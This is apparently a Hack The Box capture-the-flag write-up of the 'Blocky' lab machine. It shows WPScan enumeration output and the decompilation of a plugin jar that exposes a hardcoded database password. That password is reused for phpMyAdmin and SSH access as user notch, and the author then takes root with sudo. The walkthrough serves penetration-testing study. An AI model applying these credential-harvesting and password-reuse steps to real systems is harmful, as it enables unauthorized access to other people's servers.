Based on the OpenSSH and Apache versions, the host is likely running Ubuntu 16.04 Xenial. There’s also something interesting going on with TCP 25565, as it’s reporting closed.
I find this web is WordPress as "proudly powered by WordPress" and it has wiki system as the server. I check this post and found the user account name notch and login page.
The default login admin:admin does not work.
There are no plugins found. It does identify the notch user I noted earlier on the site.
┌──(root💀kali)-[~/Desktop/htb/blocky]
└─# wpscan --url http://10.10.10.37 -e ap,t,tt,u
130 ⨯
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |) | (_ ___ __ _ _ __ ®
\ \/ \/ / | ***/ *** \ / __|/ ` | ' \
\ /\ / | | _) | (| (| | | | |
\/ \/ || |*****/ |,|| |*|
WordPress Security Scanner by the WPScan Team
Version 3.8.19
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://10.10.10.37/ [10.10.10.37]
[+] Started: Sun Nov 21 03:10:43 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.10.37/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.10.37/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.10.37/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.37/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.10.37/index.php/feed/, <generator>https://wordpress.org/?v=4.8</generator>
| - http://10.10.10.37/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.10.37/wp-content/themes/twentyseventeen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured
images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Most Popular Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:02:32
<=============================================================================
=========> (400 / 400) 100.00% Time: 00:02:32
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] Theme(s) Identified:
[+] twentyfifteen
| Location: http://10.10.10.37/wp-content/themes/twentyfifteen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://10.10.10.37/wp-content/themes/twentyfifteen/style.css
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's
simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.37/wp-content/themes/twentyfifteen/, status: 500
|
| Version: 1.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.8'
[+] twentyseventeen
| Location: http://10.10.10.37/wp-content/themes/twentyseventeen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured
images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Known Locations (Aggressive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/, status: 500
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.3'
[+] twentysixteen
| Location: http://10.10.10.37/wp-content/themes/twentysixteen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentysixteen/readme.txt
| [!] The version is out of date, the latest version is 2.5
| Style URL: http://10.10.10.37/wp-content/themes/twentysixteen/style.css
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the
horizontal masthead ...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.37/wp-content/themes/twentysixteen/, status: 500
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.3'
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:04:42
<=============================================================================
=======> (2575 / 2575) 100.00% Time: 00:04:42
[i] No Timthumbs Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01
<=============================================================================
===========> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] notch
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Notch
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Nov 21 03:18:20 2021
[+] Requests Done: 3050
[+] Cached Requests: 19
[+] Data Sent: 825.099 KB
[+] Data Received: 18.245 MB
[+] Memory used: 264.414 MB
[+] Elapsed time: 00:07:37
From that list, I’ll check out /wiki, /plugins, and /phpmyadmin
visit 10.10.10.37:80/wiki
visit 10.10.10.37:80/phpmyadmin
I find default login admin:admin does not work.
visit 10.10.10.37:80/plugins
I find two .jar files (BlockyCore.jar and griefprevention-1.11.2- 3.1.1.298.jar) and download in my host machine.
A JAR is a package file format typically used to aggregate many Java class files and associated metadata and resources into one file for distribution. JAR files are archive files that include a Java-specific manifest file. They are built on the ZIP format and typically have a .jar file extension.
Shell as notch
Reverse Jars
I use JD-Gui to be decompile the java files.JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files. You can browse the reconstructed source code with the JD-GUI for instant access to methods and fields.
jd-gui:
How to install: sudo apt install jd-gui,
more details link :https://www.kali.org/tools/jd-gui/ Install jd-gu
After installation, I launch the jd-gui with the command"jd-gui". Then I choose to check each jar file. I found the root login details in blockycore.class.
public class BlockyCore {
** public String sqlHost = "localhost";**
** public String sqlUser = "root";**
** public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";**
I try to login phpmyadmin account with root:8YsqfCTnvxAUeduzjNSXe22, and login successfully.
I check wp_users and found the user notch information as followed.
SELECT * FROM `wp_users`
I choose "hash-identifier" to identify the possible hash "BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/". Hash-identifier is a software to identify the different types of hashes used to encrypt data and especially passwords.Find more information link: https://www.kali.org/tools/hash-identifier/
How to install:
apt install hash-identifier
I launch hash-identifier with the following command
hash-identifier
I know the hash is most likely to be an MD5 (WordPress) hash.
Exploitation(SSH -Port 22 )
I use SSH to login root or notch account.
The SSH protocol (also referred to as Secure Shell) is a method for secure remote login from one computer to another. It provides several alternative options for strong authentication, and it protects the communications security and integrity with strong encryption. It is a secure alternative to the non-protected login protocols (such as telnet, rlogin) and insecure file transfer methods (such as FTP).
More details : https://www.ssh.com/ssh/protocol/
I find two user accounts (notch and root) and a password 8YsqfCTnvxAUeduzjNSXe22. I use ssh to login account notch with the command.
sshpass -p 8YsqfCTnvxAUeduzjNSXe22 ssh notch@10.10.10.37
or
ssh notch@10.10.10.37
User Notch
Ilogin notch with ssh but I get the error information "ssh: connect to host 10.10.10.37 port 22: No route to host". I google this error and find the resolve information link:https://www.tecmint.com/fix-no-route-to-host-ssh-error-in-linux/
I choose to use ufw and then got another error information "zsh: command not found: ufw". I have to install the ufw tool and find the ufw installation information "apt install -y ufw". The details link is https://www.hiroom2.com/2017/07/20/kalilinux-2017-1-ufw-en
Login with tool SSHPASS
sshpass is a utility designed for running ssh using the mode referred to as “keyboard-interactive” password authentication, but in non-interactive mode. ssh uses direct TTY access to make sure that the password is indeed issued by an interactive keyboard user. Sshpass runs ssh in a dedicated tty, fooling it into thinking it is getting the password from an interactive user. More information link:
I use the command "sudo -l" and "sudo su -" to get root access. The root password is the same as notch.
Sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for "superuser do" as the older versions of sudo were designed to run commands only as the superuser.
More information link:https://en.wikipedia.org/wiki/Sudo
I can see that Notch has unlimited privileges and can run any command on the system.Then I root it with "sudo su -".
Thanks for reading . This is my 41th pwned machines in Hack the box. I will try harder to be beyond OSCP. Then I can pass OSCP successfully.
